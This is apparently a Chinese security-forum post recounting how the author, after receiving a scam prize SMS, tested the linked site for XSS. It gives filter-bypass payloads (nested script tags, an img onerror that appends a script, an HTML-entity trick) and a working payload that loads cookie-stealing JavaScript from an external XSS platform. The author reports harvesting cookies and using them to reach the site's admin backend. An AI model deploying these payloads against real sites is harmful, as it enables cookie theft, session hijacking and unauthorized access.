前几天上课的时候,忽然收到一条短信,
安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
打开网址如下:
安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
既然能便宜买那就打开看看吧,随手x了一句:
<code><script>alert(1)</script></code>发现报错了,我以为是对<script>进行了过滤(后来发现仅仅是对script进行过滤),然后就尝试
<code><scr<script>ipt>alert(1)</scr<script>ipt></code>发现还是报错,然后考虑是不是只过滤script这个字符串,然后<code><img src="#"></code>发现可以了安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
然后中午回去准备添加盗取cookies的代码,结果发现怎么都过不去,有一个点一直想不通,就是不知道对方到底过滤了什么,然后js填进去一直报错,我就一直想不通怎么在onerror事件里面让js生效,后来请教了好多人,得到的结果一直是没办法,这个没什么可x的,得不到什么结果,然后就放在一旁了,结果今天在论天逛的时候,发现了Black-Hole他的一篇文章里面提到了<imgsrc=x onerror=appendChild(createElement('script')).src='js_url' />这种用法,我一下子眼前一亮,然后知道了怎么添加js,非常感谢原作者,原文链接是XSS的原理分析与解剖http://bbs.secbox.cn/forum.php?mod=viewthread&tid=520&fromuid=743(出处: 安全盒子论坛)也希望能多加学习,然后就是登陆平台添加了一下盗取cookies代码,然后结合上文对过滤猜测的失误,我在想是不是仅仅是对script这个字符串进行了过滤,然后把t换成了&#116<code><img src=xonerror=appendChild(createElement ('scrip&#116')).src='http://xss.0exp.cn/VdYVBx?1448952953'/></code>然后提示成功: 安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
打进去以后不一会,就收到cookies
安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
然后就拖入老兵,进行访问。
安全盒子原创文章:一次收到”中奖短信“后的XSS测试-安全盒子
得到后台。